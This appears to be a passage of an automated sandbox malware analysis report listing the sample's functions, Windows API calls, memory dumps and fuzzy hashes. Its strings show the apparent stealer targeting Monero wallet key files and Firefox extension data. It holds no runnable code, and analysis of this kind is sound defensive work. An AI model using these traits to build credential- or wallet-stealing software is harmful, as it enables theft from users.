                                        • Instruction Fuzzy Hash: 0801C2B5A40308BBDB04DFD4DC59FAEB7B8EB48701F108195FA15A7280DA759A418F51
                                        Function 0092C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: c0efee04449af9041618741099a48fc1489bc6eca6766f11fece35e1ad79e1dc
                                        • Instruction ID: 55b3ec743e721ea61177737a339426037adebe0774c4c624a9cc791d441008ce
                                        • Opcode Fuzzy Hash: c0efee04449af9041618741099a48fc1489bc6eca6766f11fece35e1ad79e1dc
                                        • Instruction Fuzzy Hash: B441F5F51007AC5EDB218B249C84FFFBBECAF45704F1448E8E98A86186D2719A849F60
                                        Function 00926630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00926663
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00926726
                                        • ExitProcess.KERNEL32 ref: 00926755
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: a5022cf0ce93f4961a76887252c7a38f9765c94385865aeec1d61352fe81093c
                                        • Instruction ID: 8564e8392a33877c1f32646e916f6dd2c4987188cc12d57b808b83edf1fa09e8
                                        • Opcode Fuzzy Hash: a5022cf0ce93f4961a76887252c7a38f9765c94385865aeec1d61352fe81093c
                                        • Instruction Fuzzy Hash: 7B312DB2801228ABDB14EB90EC92FDE7778AF48300F404589F20577195DF746B88CF5A
                                        Function 009287C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E28,00000000,?), ref: 0092882F
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00928836
                                        • wsprintfA.USER32 ref: 00928850
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 742514d84e17ab5e3407c6e035929ec2898f416081a67427b0dc647d0fbfc8dd
                                        • Instruction ID: d57135a42e38e33b0724867557c15af92cf873920ce671819e1860a8b02a819f
                                        • Opcode Fuzzy Hash: 742514d84e17ab5e3407c6e035929ec2898f416081a67427b0dc647d0fbfc8dd
                                        • Instruction Fuzzy Hash: A2211FB1A40308AFDB04DF94DD49FAEBBB8FB48711F104259F605B7290CB79A901CBA1
                                        Function 00928D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0092951E,00000000), ref: 00928D5B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00928D62
                                        • wsprintfW.USER32 ref: 00928D78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 5899e8a613e437bfa3e585097767abec973cfc7c329d3b13058fd8938e6b69a2
                                        • Instruction ID: 1efe7482c0a6b80fd003325ceb439953072fdaeda54322b0ac8ff3b2160156f9
                                        • Opcode Fuzzy Hash: 5899e8a613e437bfa3e585097767abec973cfc7c329d3b13058fd8938e6b69a2
                                        • Instruction Fuzzy Hash: 56E0ECB5A40308BBD710DB94DD1AF6977B8EB48702F004294FE09A7280DE719E109B96
                                        Function 0091A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091A2E1
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0091A3FF
                                        • lstrlen.KERNEL32(00000000), ref: 0091A6BC
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091A743
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: a86ca04c643cf3231d124bf3eb8b67b895195b54d1e640540d63af3ab77362ab
                                        • Instruction ID: 60a99362ab3a261cb7916d755bb15ed3702b5d5ecac456539597e08d72840e0c
                                        • Opcode Fuzzy Hash: a86ca04c643cf3231d124bf3eb8b67b895195b54d1e640540d63af3ab77362ab
                                        • Instruction Fuzzy Hash: 72E1DF739101289BDB05FBA4EC92FEE733CAF98300F508559F516760A5EF306A49CB66
                                        Function 0091D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D481
                                        • lstrlen.KERNEL32(00000000), ref: 0091D698
                                        • lstrlen.KERNEL32(00000000), ref: 0091D6AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091D72B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 85c9f6af8e86ddcbe4ec4f8a0ab489a3a7a324f7a0e1a7ea9fbcdd3323c86e2d
                                        • Instruction ID: 64c74c4ce344a2ba120b1f0cf93825431ae6f55a4eed94715c47af68851866d5
                                        • Opcode Fuzzy Hash: 85c9f6af8e86ddcbe4ec4f8a0ab489a3a7a324f7a0e1a7ea9fbcdd3323c86e2d
                                        • Instruction Fuzzy Hash: CC91F0739101289BDB04FBA4EC96FEE7339AF94300F504568F506B60A5EF346A49CB66
                                        Function 0091D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D801
                                        • lstrlen.KERNEL32(00000000), ref: 0091D99F
                                        • lstrlen.KERNEL32(00000000), ref: 0091D9B3
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091DA32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 9bca03dfde8887ca18939204656e57ea8e8bcd1676e48d76d3110c30a303e417
                                        • Instruction ID: 7cffe09bd5ea758156cf71a66b5ca3eba82c9ceefdf3165ead9436c422673ca2
                                        • Opcode Fuzzy Hash: 9bca03dfde8887ca18939204656e57ea8e8bcd1676e48d76d3110c30a303e417
                                        • Instruction Fuzzy Hash: 0981EF739101289BDB04FBA4EC96FEE7339AF94300F504558F506B70A5EF346A49CBA6
                                        Function 0091F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00931580,00930D92), ref: 0091F54C
                                        • lstrlen.KERNEL32(00000000), ref: 0091F56B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: b8717481a6bf366fd759f846cf4dcbd1c65207187d575e6c326c03bcc3143597
                                        • Instruction ID: b7a11d6cfd178944c087e94c74861b88f91878b02c198e55c3067d04927cbfd6
                                        • Opcode Fuzzy Hash: b8717481a6bf366fd759f846cf4dcbd1c65207187d575e6c326c03bcc3143597
                                        • Instruction Fuzzy Hash: 48510276D10118ABDB04FBA4EC96EED737DAFD4300F408528F41667196EE346A09CBA6
                                        Function 00923560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 9eabab0a92522f543793ce0e732bc2b5eafb5a03c6d77cf3505b5ce6fd557f8b
                                        • Instruction ID: 6b09c2569dda0a415081951a5ba920d01bf0c4b8bce91b4d7ce8c2d9fc730400
                                        • Opcode Fuzzy Hash: 9eabab0a92522f543793ce0e732bc2b5eafb5a03c6d77cf3505b5ce6fd557f8b
